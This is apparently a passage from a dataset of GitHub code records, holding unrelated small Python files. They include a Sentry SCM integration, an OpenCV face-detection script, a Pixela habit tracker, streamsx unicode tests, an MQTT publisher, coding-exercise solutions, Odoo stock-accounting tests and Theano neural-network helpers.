IntegrationInstallation,\n IntegrationMetadata,\n IntegrationProvider,\n)\nfrom sentry.integrations.mixins import RepositoryMixin\nfrom sentry.models.repository import Repository\nfrom sentry.pipeline import PipelineView\nfrom sentry.web.helpers import render_to_response\n\nfrom .repository import CustomSCMRepositoryProvider\n\nDESCRIPTION = \"\"\"\nCustom Source Control Management (SCM)\n\"\"\"\n\nFEATURES = [\n FeatureDescription(\n \"\"\"\n Send your own commits\n \"\"\",\n IntegrationFeatures.COMMITS,\n ),\n FeatureDescription(\n \"\"\"\n Stack trace linky dink\n \"\"\",\n IntegrationFeatures.STACKTRACE_LINK,\n ),\n]\n\nmetadata = IntegrationMetadata(\n description=DESCRIPTION.strip(),\n features=FEATURES,\n author=\"The Sentry Team\",\n noun=_(\"Installation\"),\n issue_url=\"https://github.com/getsentry/sentry/issues/\",\n source_url=\"https://github.com/getsentry/sentry/tree/master/src/sentry/integrations/custom_scm\",\n aspects={},\n)\n\n\nclass CustomSCMIntegration(IntegrationInstallation, RepositoryMixin):\n def get_client(self):\n pass\n\n def get_stacktrace_link(\n self, repo: Repository, filepath: str, default: str, version: str\n ) -> str | None:\n \"\"\"\n We don't have access to verify that the file does exists\n (using `check_file`) so instead we just return the\n formatted source url using the default branch provided.\n \"\"\"\n return self.format_source_url(repo, filepath, default)\n\n def format_source_url(self, repo: Repository, filepath: str, branch: str) -> str:\n # This format works for GitHub/GitLab, not sure if it would\n # need to change for a different provider\n return f\"{repo.url}/blob/{branch}/{filepath}\"\n\n def get_repositories(self, query=None):\n \"\"\"\n Used to get any repositories that are not already tied\n to an integration.\n \"\"\"\n repos = Repository.objects.filter(\n organization_id=self.organization_id,\n provider__isnull=True,\n integration_id__isnull=True,\n status=ObjectStatus.VISIBLE,\n )\n return [{\"name\": repo.name, \"identifier\": str(repo.id)} for repo in repos]\n\n\nclass InstallationForm(forms.Form):\n name = forms.CharField(\n label=_(\"Name\"),\n help_text=_(\n \"The name for your integration.\"\n \"
    \"\n \"If you are using GitHub, use the organization name.\"\n ),\n )\n url = forms.CharField(\n label=_(\"URL\"),\n help_text=_(\n \"The base URL for your instance, including the host and protocol. \"\n \"
    \"\n \"If using github.com, enter https://github.com/\"\n ),\n widget=forms.TextInput(attrs={\"placeholder\": \"https://github.com/\"}),\n )\n\n\nclass InstallationConfigView(PipelineView):\n def dispatch(self, request: Request, pipeline) -> Response:\n if request.method == \"POST\":\n form = InstallationForm(request.POST)\n if form.is_valid():\n form_data = form.cleaned_data\n\n pipeline.bind_state(\"installation_data\", form_data)\n\n return pipeline.next_step()\n else:\n form = InstallationForm()\n\n return render_to_response(\n template=\"sentry/integrations/custom-scm-config.html\",\n context={\"form\": form},\n request=request,\n )\n\n\nclass CustomSCMIntegrationProvider(IntegrationProvider):\n key = \"custom_scm\"\n name = \"Custom Source Control Management (SCM)\"\n requires_feature_flag = True\n metadata = metadata\n integration_cls = CustomSCMIntegration\n features = frozenset(\n [\n IntegrationFeatures.COMMITS,\n IntegrationFeatures.STACKTRACE_LINK,\n IntegrationFeatures.CODEOWNERS,\n ]\n )\n\n def get_pipeline_views(self):\n return [InstallationConfigView()]\n\n def build_integration(self, state):\n name = state[\"installation_data\"][\"name\"]\n url = state[\"installation_data\"][\"url\"]\n # normally the external_id would be something unique\n # across organizations, but for now there can just be\n # separate integrations for separate organizations\n external_id = uuid4().hex\n\n return {\n \"name\": name,\n \"external_id\": external_id,\n \"metadata\": {\"domain_name\": f\"{url}{name}\"},\n }\n\n def setup(self):\n from sentry.plugins.base import bindings\n\n bindings.add(\n \"integration-repository.provider\",\n CustomSCMRepositoryProvider,\n id=\"integrations:custom_scm\",\n )\n","repo_name":"gms-ws-sandbox/sentry","sub_path":"src/sentry/integrations/custom_scm/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":5021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"919253037","text":"\n\nimport requests\nimport cv2\nimport numpy as np\n\nface_detect = cv2.CascadeClassifier(\"/root/Desktop/jupyter/haarcascade_frontalface_default.xml\")\ncap=cv2.VideoCapture(0)\nurl =\"http://100.107.5.216:8080/shot.jpg\"\n\nwhile True:\n geturl=requests.get(url)\n photoweb=geturl.content\n photobyte=bytearray(photoweb)\n image=np.array(photobyte)\n frame=cv2.imdecode(image,-1)\n ret,photo=cap.read()\n faces = face_detect.detectMultiScale(photo)\n if faces is not ():\n \n x=faces[0][0]\n y=faces[0][1]\n w=faces[0][2]\n h=faces[0][3]\n #photo=cv2.rectangle(photo,(x,y),(x+w,y+h),(0,255,0),4)\n r_photo=photo[y-20:y+h+20,x-20:x+w+20]\n resize=cv2.resize(r_photo,(200,200))\n photo[0:200,0:200]=resize\n \n cv2.imshow(\"hi\",frame)\n cv2.imshow(\"hi\",photo)\n if cv2.waitKey(1)==13:\n break\ncv2.destroyAllWindows()\ncap.release()\n\n\n","repo_name":"surajsolanki724/LinuxWorld-Training","sub_path":"phone_detect.py","file_name":"phone_detect.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36430448618","text":"import requests\nimport datetime\n\npixela_endpoint = \"https://pixe.la/v1/users\"\nUSERNAME = \"USERNAME\"\nTOKEN = \"TOKEN\"\n\nuser_params = {\n\n \"token\": TOKEN,\n \"username\" : USERNAME,\n \"agreeTermsOfService\": \"yes\",\n \"notMinor\" : \"yes\"\n}\n\n# response = requests.post(url = pixela_endpoint, json=user_params)\n# print(response.text)\n\ngraph_endpoint = 
f\"{pixela_endpoint}/{USERNAME}/graphs\"\n\ngraph_config = {\n\n \"id\" : \"graph1\",\n \"name\": \"Piano Graph\",\n \"unit\": \"Hours\",\n \"type\": \"int\",\n \"color\": \"sora\"\n}\n\nheaders = {\n\n \"X-USER-TOKEN\" : TOKEN\n}\n\n# response = requests.post(url = graph_endpoint, json= graph_config, headers = headers)\n# print(response.text)\n\nvalue_endpoint = f\"{graph_endpoint}/graph1\"\n\ntoday = datetime.datetime.now( )\n# print(today)\nvalue_params = {\n\n \"date\": today.strftime(\"%Y%m%d\"),\n \"quantity\": \"1\"\n}\n# response = requests.post(url = value_endpoint, json= value_params, headers = headers)\n# print(response.text)\n\nupdate_endpoint = f\"{value_endpoint}/{today.strftime('%Y%m%d')}\"\n\n# response = requests.put(url = update_endpoint, json=value_params,headers=headers)\n# print(response.text)\n\nresponse= requests.delete(url=update_endpoint, headers=headers)\nprint(response.text)\n","repo_name":"NinjaNekoSama/Habit-Tracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13930400991","text":"from __future__ import print_function\nimport unittest\n\nfrom streamsx.topology.topology import *\nfrom streamsx.topology.tester import Tester\nfrom streamsx.topology import context\nfrom streamsx.topology.context import ConfigParams\nfrom streamsx import rest\nimport streamsx.ec as ec\n\n\nimport test_vers\n\n@unittest.skipIf(not test_vers.tester_supported() , \"Tester not supported\")\nclass TestUnicode(unittest.TestCase):\n def setUp(self):\n Tester.setup_standalone(self)\n\n def test_strings(self):\n \"\"\" Test strings that are unicode.\n Includes a stream name to verify it\n does not cause an error, but under the covers\n the actual name will be a mangled version of it\n since SPL identifiers are only ASCII.\n \"\"\"\n topo = Topology()\n ud = []\n ud.append(u'⡍⠔⠙⠖ ⡊ ⠙⠕⠝⠰⠞ ⠍⠑⠁⠝ ⠞⠕ ⠎⠁⠹ ⠹⠁⠞ ⡊ ⠅⠝⠪⠂ ⠕⠋ ⠍⠹')\n ud.append(u'2H₂ + O₂ ⇌ 2H₂O, R = 4.7 kΩ, ⌀ 200 mm')\n ud.append(u'многоязычных')\n ud.append(\"Arsenal hammered 5-1 by Bayern again\")\n s = topo.source(ud, name=u'façade')\n sas = s.as_string()\n sd = s.map(lambda s : {'val': s + u\"_test_it!\"})\n tester = Tester(topo)\n tester.contents(s, ud)\n tester.contents(sas, ud)\n dud = []\n for v in ud:\n dud.append({'val': v + u\"_test_it!\"})\n tester.contents(sd, dud)\n\n tester.test(self.test_ctxtype, self.test_config)\n print(tester.result)\n\n def test_view_name(self):\n \"\"\"\n Test view names that are unicode.\n \"\"\"\n if self.test_ctxtype == context.ContextTypes.STANDALONE:\n return self.skipTest(\"Skipping unicode view tests for standalone.\")\n view_names = [u\"®®®®\", u\"™¬⊕⇔\"]\n topo = Topology()\n\n view0 = topo.source([\"hello\"]).view(name=view_names[0])\n view1 = topo.source([\"view!\"]).view(name=view_names[1])\n\n self.tester = Tester(topo)\n self.tester.local_check = self._check_view_names\n\n self.tester.test(self.test_ctxtype, self.test_config)\n\n def _check_view_names(self):\n job = self.tester.submission_result.job\n view_names = []\n for view in job.get_views():\n view_names.append(view.name)\n self.assertIn(u\"®®®®\", view_names)\n self.assertIn(u\"™¬⊕⇔\", view_names)\n\n@unittest.skipIf(not test_vers.tester_supported() , \"Tester not supported\")\nclass TestDistributedUnicode(TestUnicode):\n def setUp(self):\n Tester.setup_distributed(self)\n\n # Get username and password\n username = os.getenv(\"STREAMS_USERNAME\", \"streamsadmin\")\n password = 
os.getenv(\"STREAMS_PASSWORD\", \"passw0rd\")\n\n self.sc = rest.StreamsConnection(username=username, password=password)\n\n # Disable SSL verification\n self.sc.session.verify = False\n self.test_config[ConfigParams.STREAMS_CONNECTION] = self.sc\n\n@unittest.skipIf(not test_vers.tester_supported() , \"Tester not supported\")\nclass TestBluemixUnicode(TestUnicode):\n def setUp(self):\n Tester.setup_streaming_analytics(self, force_remote_build=True)\n vcap = self.test_config.get('topology.service.vcap')\n sn = self.test_config.get('topology.service.name')\n self.sc = rest.StreamingAnalyticsConnection(vcap, sn)\n","repo_name":"wmarshall484/streamsx.topology","sub_path":"test/python/topology/test2_unicode.py","file_name":"test2_unicode.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"21985616679","text":"import re\r\nimport string\r\n\r\n#Option 1\r\ndef ListItemPurchased(): \r\n\r\n listPurchased = open('GroceryItems.txt') #Opens GroceryItems list\r\n\r\n contentsRead = listPurchased.read() #Reads GroceryItems\r\n\r\n items = contentsRead.split()\r\n\r\n itemsBought = [] #List that stores the items bought from GroceryItems\r\n\r\n for item in items: #For loop that add items to ItemsBought\r\n if item not in itemsBought:\r\n itemsBought.append(item)\r\n\r\n itemsBought.sort() #Sorts itemsBought\r\n\r\n for items in itemsBought:\r\n print(contentsRead.count(items), items) #Prints a list with a numerical value from ItemsBought\r\n \r\n\r\n return 0\r\n\r\n\r\n#Option 2\r\ndef ItemsList():\r\n listPurchased = open('GroceryItems.txt') #Opens GroceryItems list\r\n\r\n contentsRead = listPurchased.read() #Reads GroceryItems\r\n\r\n items = contentsRead.split()\r\n\r\n itemsBought = []\r\n\r\n for item in items:\r\n if item not in itemsBought:\r\n itemsBought.append(item)\r\n\r\n itemsBought.sort()\r\n\r\n listToStr = '\\n'.join(map(str, itemsBought)) #Joins the itemsBought list into a more legible list for the user to see and read\r\n\r\n print(listToStr)\r\n\r\ndef SpecificItem(k):\r\n\r\n listPurchased = open('GroceryItems.txt') #Opens GroceryItems list\r\n\r\n contentsRead = listPurchased.read() #Reads GroceryItems\r\n\r\n items = contentsRead.split()\r\n\r\n itemsBought = []\r\n\r\n for item in items:\r\n if item not in itemsBought:\r\n itemsBought.append(item)\r\n\r\n itemsBought.sort()\r\n\r\n if k in itemsBought:\r\n print(contentsRead.count(k), k, \"were purchased today\") #Gets the user input from C++ and tells the user how many of that item was purchased on the given day\r\n\r\n if k not in itemsBought:\r\n print(\"Invalid Item\") #User input was not found on list, so returns an error.\r\n\r\n return 0\r\n\r\n#Option 3\r\ndef Histogram():\r\n listPurchased = open('GroceryItems.txt') #Opens GroceryItems list\r\n\r\n contentsRead = listPurchased.read() #Reads GroceryItems\r\n\r\n items = contentsRead.split()\r\n\r\n itemsBought = []\r\n\r\n for item in items:\r\n if item not in itemsBought:\r\n itemsBought.append(item)\r\n\r\n itemsBought.sort()\r\n\r\n #For loop for the creation of the Histogram\r\n for items in itemsBought: \r\n itemCount = contentsRead.count(items)\r\n output = ''\r\n while(itemCount > 0):\r\n output += '*' #Print '*' for every item in the list\r\n itemCount -= 1\r\n print(items.ljust(13), output)\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"SerchMat/CS-210","sub_path":"Project 
3/Release/PythonCode.py","file_name":"PythonCode.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26424401895","text":"import datetime\r\nimport time\r\n\r\nimport paho.mqtt.client as mqtt\r\nimport json\r\n\r\nwhile True:\r\n try:\r\n\r\n t_format = '%m-%d %H:%M'\r\n t = datetime.datetime.now().strftime(t_format)\r\n payload = {\"Tiem\": t, \"Name\": \"Berlin\"}\r\n\r\n client = mqtt.Client(client_id=\"berlin\")\r\n client.username_pw_set('chen', '0000')\r\n client.connect('140.112.94.129', 20010, 60)\r\n\r\n client.publish(\"mqtt_class/test\", json.dumps(payload))\r\n print(payload)\r\n time.sleep(30)\r\n\r\n except Exception as exc:\r\n print(exc)\r\n\r\n\r\n\r\n\r\n","repo_name":"berlin0308/PORTFOLIO","sub_path":"Research_Projects/LAB_Practices/RPI/MQTT_pub_Test.py","file_name":"MQTT_pub_Test.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"19072075127","text":"# 완전탐색\nimport collections\ndef solution(answers):\n if answers == []:\n return []\n \n pick = [[1, 2, 3, 4, 5], [2, 1, 2, 3, 2, 4, 2, 5], [3, 3, 1, 1, 2, 2, 4, 4, 5, 5]]\n index = [None, None, None]\n \n answer = collections.defaultdict(int)\n for i in range(len(answers)):\n index[0] = i % 5\n index[1] = i % 8\n index[2] = i % 10\n for j in range(3):\n if answers[i] == pick[j][index[j]]:\n answer[j] += 1\n \n max_score_key, max_score_value = max(answer.items(), key = lambda x: x[1]) \n result = []\n for k, v in answer.items():\n if v == max_score_value:\n result.append(k+1)\n result.sort()\n return result\n","repo_name":"kimdw92/problem_solving","sub_path":"programmers/2_모의고사.py","file_name":"2_모의고사.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7420296952","text":"\"\"\"\nthis sky-box is implemented manually\nit's not perfect but it works\nabdo-taha\n\"\"\"\nclass skyboxcoord:\n l = 100 # length of cube\n\n vertices = [\n [-l,l,l],\n [l,l,l],\n [l,l,-l],\n [-l,l,-l],\n [-l,-l,l],\n [l,-l,l],\n [l,-l,-l],\n [-l,-l,-l]\n ]\n\n prec = 1.0/3\n # needs to move inside about 1.5 pixel to avoid black line\n #still not the best\n delta3 = 1.5/1536\n delta4 = 1.5/2048\n textcoord = [\n [1-delta3, 0.5-delta4],\n [1-delta3, 0.25+delta4],\n [2 * prec-delta3 , 1-delta4],\n [2 * prec-delta3, 0.75+delta4],\n [2 * prec-delta3, 0.5-delta4],\n [2 * prec-delta3, 0.25+delta4],\n [2 * prec-delta3, 0+delta4],\n [1 * prec+delta3, 1-delta4],\n [1 * prec+delta3, 0.75+delta4],\n [1 * prec+delta3, 0.5-delta4],\n [1 * prec+delta3, 0.25+delta4],\n [1 * prec+delta3, 0+delta4],\n [0+delta3, 0.5-delta4],\n [0+delta3, 0.25+delta4]\n ]\n\n faces= [\n [1,6],[2,5],[3,1],[4,2],\n [1,6],[2,5],[6,10],[5,11],\n [5,11],[6,10],[7,13],[8,14],\n [2,5],[6,10],[7,9],[3,4],\n [3,4],[7,9],[8,8],[4,3],\n [1,6],[5,11],[8,12],[4,7]\n ]\n co=[]\n\n def coord(self):\n for pair in self.faces:\n self.co.extend(self.vertices[pair[0]-1])\n self.co.extend(reversed( self.textcoord[pair[1]-1] ))\n return self.co\n","repo_name":"abdo-taha/computerGraphics","sub_path":"maze-runner/skyboxcoord.py","file_name":"skyboxcoord.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"28837210909","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input()) \r\ndp = [[0] * 
10 for _ in range(n + 1)]\r\n\r\nfor i in range(10):\r\n # 한 자릿 수 일 때 값을 초기화\r\n dp[1][i] = 1\r\n\r\nfor i in range(2, n + 1):\r\n for j in range(10):\r\n for k in range(j, 10):\r\n # i는 자리수 \r\n # j는 마지막 자리수의 수\r\n # k는 j에 따른 새로 올 수 있는 수\r\n dp[i][k] += dp[i - 1][j]\r\n \"\"\" 마지막 숫자가 1이면 1 ~ 9가 올 수 있음 \r\n 바로 전 단계의 마지막수가 같은 것을 더해간다\r\n 최종 결과는 n번째 열의 합\r\n \"\"\"\r\n\r\nprint(sum(dp[n]) % 10007)\r\n","repo_name":"gnlenfn/DailyProblemSolving","sub_path":"백준/Silver/11057. 오르막 수/오르막 수.py","file_name":"오르막 수.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70069395127","text":"import sys, os, urllib\n\n#get the csv file from google finance\ntickerSymbol= raw_input('Enter the ticker symbol: ')\nstartDate = raw_input('Enter the start date(Ex. Jan 20, 2015): ')\nendDate = raw_input('Enter the end date: ')\nstartDate.replace (\" \", \"+\")\nstartDate.replace (\",\", \"2C\")\nendDate.replace (\" \", \"+\")\nendDate.replace (\",\", \"2C\")\n\nurl = \"http://www.google.com/finance/historical?q=\"+str(tickerSymbol)+\"&startdate=\"+str(startDate)+\"&enddate=\"+str(endDate)+\"&output=csv\"\n \n\nurllib.urlretrieve(url, str(tickerSymbol))\nif os.path.isfile(str(tickerSymbol)):\n os.rename(str(tickerSymbol), str(tickerSymbol)+\".csv\")\n print (\"--File Fetched--\")\n sys.exit()\n\nprint (\"--Could not find file--\")\n\n\n#rearrange so latest date is at the bottom of the list\n#stock = str(tickerSymbol)+' '+str(startDate)+' '+str(endDate)\n#open('csv_out.csv', 'w').writelines(open(stock, 'r').readlines()[::-1])\n","repo_name":"usmanzch/StockProject","sub_path":"stockFetch.py","file_name":"stockFetch.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38361284963","text":"# ============================================================================\n# String - Operation\n\ntext = \" Hello World \"\nprint(text)\ntext = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n\nprint(text[2:5]) \n# text = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n# out = 345\n\nprint(text[:5]) \n# text = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n# out = 12345\n\nprint(text[5:]) \n# text = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n# out = 67890abcdfghijklmnopqrstuvwxyz\n\nprint(text[-5:]) \n# text = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n# out = vwxyz\n\nprint(text[:-5]) \n# text = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n# out = 1234567890abcdfghijklmnopqrstu\n\nprint(text[7]) \n# text = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n# out = 8\n\nprint(text[-7]) \n# text = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n# out = t\n\nprint(len(text))\n\n# textFindAndReplace -----\ntext = 'Hello=World=Cup'\ntext = text.replace(\"=\",\", \")\n# out = Hello, World, Cup, \n\n# textToArray -----\n# text awal adalah string, text berikutnya berbentuk list array yang dipisah dari string berdasarkan symbol '='\ntext = 'Hello=World=Cup'\ntext = text.split(\"=\")\n\n\n\n\n# ============================================================================\n# Control - Operation\n\ntext = \"01 Hello\"\nif len(text) > 3:\n\tprint(text)\n\t\n\tif len(text) == 30:\n\t\ttext =\"02 Hello\"\n\telif len(text) <= 30:\n\t\ttext =\"02 World\"\n\telse:\n\t\ttext =\"02 Cup\"\n\t\n\tprint(text)\n\t\n\t\n# ============================================================================\n# List - Array Operation\n\ntextIn = 
[]\ntextIn.append(True)\ntextIn.append(False)\ntextIn.append(False)\ntextIn.append(True)\ntextIn.append(False)\ntextIn.append('Knight')\ntextIn.append('Monster')\ntextIn.remove('Knight')\n\n# arrayToText\nthislist = [\"apple\",\"banana\",\"cherry\"]\nseperator = ',~~~~ ~'\nprint(seperator.join(thislist))\n# out = \"apple,~~~~ ~banana,~~~~ ~cherry\"\n\n# findIndexArray\nthislist = [\"apple\", \"banana\", \"cherry\"]\nprint(thislist.index('cherry'))\n# out = 2\n\n\n\n# ============================================================================\n# For Loop - Operation\n\nfor character in 'hello':\n\tprint(character)\n\t# can use list array instead string\nprint('end of loop')\n\n\t\nfor i in range(5, 8):\n\tprint(i)\nprint('end of loop')\n\nfor j in range(4):\n\tprint(i)\nprint('end of loop')\n\n# ============================================================================\n# While Loop - Operation\ni = 1\nwhile i < 6:\n\tprint(i)\n\tif i == 3:\n\t\tbreak\n\ti += 1\n\t\nprint('end of loop')\n# out = 1 2 3 end of loop . \n\ni = 0\nwhile i < 6:\n\ti += 1\n\tif i == 3:\n\t\tcontinue\n\tprint(i)\n\t\nprint('end of loop')\n# out = 1 2 4 5 6 end of loop . 3 will skip\n\n# ============================================================================\n# Read File - Operation \n# Readlines Method + while loop \nfileIn = 'C:\\\\dataIn\\\\test.txt'\nwith open(fileIn,'r') as fIn:\n\tlines = fIn.readlines()\n\tnoLine = 0\n\t# untuk selanjutnya ketika ingin membaca baris cukup menggunakan lines[x] dimana x adalah baris\n\twhile noLine < len(lines):\n\t\tbarisNow = lines[noLine]\n\t\tnoLine = noLine + 1\n\n# Write \ntextError = \"Hai \\n test\"\nfileLogError = open('C:\\\\dataIn\\\\test.txt', \"a\")\t\nfileLogError.write(textError)\nfileLogError.write(\"\\n\")\nfileLogError.write(textError)\nfileLogError.close()\n\n","repo_name":"udinjelek/py","sub_path":"infoPy.py","file_name":"infoPy.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72056631926","text":"from collections import deque\n\n\ndef get_point(x, y):\n # 주사위가 도착한 칸에 대한 점수를 획득\n visit = [[0] * M for _ in range(N)]\n dq = deque()\n dq.append((x, y))\n val = board[x][y]\n visit[x][y] = 1\n cnt = 1\n while dq:\n cx, cy = dq.popleft()\n for i in range(4):\n nx = cx + dx[i]\n ny = cy + dy[i]\n if nx < 0 or ny < 0 or nx >= N or ny >= M:\n continue\n if board[nx][ny] != val or visit[nx][ny] > 0:\n continue\n dq.append((nx, ny))\n cnt += 1\n visit[nx][ny] = 1\n return cnt * val\n\n\ndef dice_move(x, y):\n # 이동 방향으로 한 칸 굴러가고 없으면 반대로 굴러감\n global dice\n global dir\n nx = x + dx[dir]\n ny = y + dy[dir]\n if nx < 0 or ny < 0 or nx >= N or ny >= M:\n dir = (dir + 2) % 4\n nx = x + dx[dir]\n ny = y + dy[dir]\n temp = []\n if dir == 0:\n temp = [dice[4], dice[1], dice[0], dice[3], dice[5], dice[2]]\n dice = temp[:]\n elif dir == 1:\n temp = [dice[1], dice[5], dice[2], dice[0], dice[4], dice[3]]\n dice = temp[:]\n elif dir == 2:\n temp = [dice[2], dice[1], dice[5], dice[3], dice[0], dice[4]]\n dice = temp[:]\n elif dir == 3:\n temp = [dice[3], dice[0], dice[2], dice[5], dice[4], dice[1]]\n dice = temp[:]\n return nx, ny\n\n\ndx = [0, 1, 0, -1]\ndy = [1, 0, -1, 0]\ndice = [1, 2, 3, 5, 4, 6] # 위, 북, 동, 남, 서, 아래\ndir = 0\npoint = 0\nN, M, K = map(int, input().split())\nboard = [list(map(int, input().split())) for _ in range(N)]\nx, y = 0, 0\nfor _ in range(K):\n x, y = dice_move(x, y)\n point += get_point(x, y)\n if dice[5] > board[x][y]:\n dir = (dir + 1) % 4\n 
elif dice[5] < board[x][y]:\n dir = (dir - 1) % 4\nprint(point)\n","repo_name":"Algorithm-Study/Algorithm","sub_path":"samsung/B23288_이영섭.py","file_name":"B23288_이영섭.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"32141278732","text":"import logging\n\nfrom odoo.tests import Form, tagged\n\nfrom odoo.addons.l10n_ro_stock_account.tests.common import TestStockCommon\n\n_logger = logging.getLogger(__name__)\n\n\n@tagged(\"post_install\", \"-at_install\")\nclass TestStockSale(TestStockCommon):\n def test_sale_notice_and_invoice(self):\n \"\"\"\n - initial in stoc si contabilitate este valoarea din achizitie\n - dupa vanzare valoarea stocului trebuie sa scada cu valoarea stocului\n vandut\n - valoarea din stoc trebuie sa fie egala cu valoarea din contabilitate\n - in contul de venituri trebuie sa fie inregistrata valoarea de vanzare\n \"\"\"\n\n self.make_purchase()\n\n self.check_stock_valuation(self.val_p1_i, self.val_p2_i)\n self.check_account_valuation(self.val_p1_i, self.val_p2_i)\n\n self.create_so(vals={\"l10n_ro_notice\": True})\n\n # valoarea de stoc dupa vanzarea produselor\n val_stock_p1 = round(self.val_p1_i - self.val_stock_out_so_p1, 2)\n val_stock_p2 = round(self.val_p2_i - self.val_stock_out_so_p2, 2)\n\n self.check_stock_valuation(val_stock_p1, val_stock_p2)\n\n # inca nu se face si descaracarea contabila de gestiune!\n self.check_account_valuation(val_stock_p1, val_stock_p2)\n\n self.create_sale_invoice()\n\n _logger.info(\"Verifcare valoare ramas in stoc\")\n self.check_stock_valuation(val_stock_p1, val_stock_p2)\n self.check_account_valuation(val_stock_p1, val_stock_p2)\n\n _logger.info(\"Verifcare valoare vanduta\")\n self.check_account_valuation(\n -self.val_so_p1, -self.val_so_p2, self.account_income\n )\n\n def test_sale_notice_and_invoice_and_retur(self):\n \"\"\"\n Vanzare si facturare\n - initial in stoc si contabilitate este valoarea din achizitie\n - dupa livrare valoarea stocului trebuie sa scada cu valoarea stocului vandut\n - trebuie sa se inregistreze in contul 418 valoare de vanzare\n - valoarea din stoc trebuie sa fie egala cu valoarea din contabilitate\n - in contul de venituri trebuie sa fie inregistrata valoarea de vanzare\n - dupa facturare soldul contului 418 trebuie sa fie zero\n \"\"\"\n\n # intrare in stoc\n self.make_purchase()\n\n # iesire din stoc prin vanzare\n self.create_so(vals={\"l10n_ro_notice\": True})\n pick = self.so.picking_ids\n\n stock_return_picking_form = Form(\n self.env[\"stock.return.picking\"].with_context(\n active_ids=pick.ids, active_id=pick.ids[0], active_model=\"stock.picking\"\n )\n )\n return_wiz = stock_return_picking_form.save()\n return_wiz.product_return_moves.write(\n {\"quantity\": 2.0, \"to_refund\": True}\n ) # Return only 2\n res = return_wiz.create_returns()\n return_pick = self.env[\"stock.picking\"].browse(res[\"res_id\"])\n\n # Validate picking\n return_pick.move_line_ids.write({\"qty_done\": 2})\n return_pick.l10n_ro_notice = True\n return_pick.button_validate()\n\n self.create_sale_invoice()\n","repo_name":"OCA/l10n-romania","sub_path":"l10n_ro_stock_account_notice/tests/test_sale.py","file_name":"test_sale.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"ro","doc_type":"code","stars":23,"dataset":"github-code","pt":"76"} +{"seq_id":"43839109572","text":"from blocks import initialization\nfrom blocks.bricks import Linear, Rectifier, NDimensionalSoftmax\n#from 
NDimensionalSoftmax import *\n\nfrom blocks.bricks.parallel import Fork\nfrom blocks.bricks.recurrent import GatedRecurrent, LSTM, SimpleRecurrent\nfrom blocks.bricks.lookup import LookupTable\nimport theano.tensor as T\nimport theano.printing as printing\nimport numpy as np\nimport theano\nimport sys\n\n#this file defines the functions that contain theano statements to build the neural network computation graph\n\n#computes MRR for a given input stream\ndef RR_cost(y, y_hat, y_mask, constant1):\n # does required indexing into y_hat\n i0 = T.repeat(T.arange(y.shape[0]), y.shape[1]).flatten()\n i1 = T.tile(T.arange(y.shape[1]), y.shape[0]).flatten()\n i2 = y.flatten()\n\n # obtain unnormalized probability values for our class label\n y_hat_probs = T.reshape(y_hat[i0,i1,i2], y.shape)\n\n #grab all probabilities greater than classes probability\n s1 = T.ge(y_hat, y_hat_probs[:, :, np.newaxis])\n\n #Calculate Ranks by summing everything greater than class probability\n s4 = s1.sum(axis=-1)\n \n #obtain reciprocal ranks\n rr = constant1/T.cast(s4, theano.config.floatX)\n\n #now compute MRR and count y_mask in calculation\n cost_a=rr* y_mask \n ymasksum = y_mask.sum()\n cost_int = cost_a.sum()\n\n return (cost_int, ymasksum)\n\n#initialize theano bricks\ndef initialize(to_init):\n for bricks in to_init:\n bricks.weights_init = initialization.Uniform(width=0.08)\n bricks.biases_init = initialization.Constant(0)\n bricks.initialize()\n\n#create softmax layer for probabilities\n#this layer takes in masks for the input\ndef softmax_layer(h, y, x_mask, y_mask, lens, vocab_size, hidden_size, boosting):\n hidden_to_output = Linear(name='hidden_to_output', input_dim=hidden_size,\n output_dim=vocab_size)\n initialize([hidden_to_output])\n linear_output = hidden_to_output.apply(h)\n linear_output.name = 'linear_output'\n softmax = NDimensionalSoftmax()\n\n #y_hat = softmax.apply(linear_output, extra_ndim=1)\n #y_hat.name = 'y_hat'\n cost_a = softmax.categorical_cross_entropy(\n y, linear_output, extra_ndim=1)\n #produces correct average\n cost_a=cost_a * y_mask \n\n if boosting:\n #boosting step, must divide by length here\n lensMat = T.tile(lens, (y.shape[0], 1))\n cost_a = cost_a / lensMat\n\n #only count cost of correctly masked entries\n cost = cost_a.sum() / y_mask.sum()\n\n\n cost.name = 'cost'\n\n return 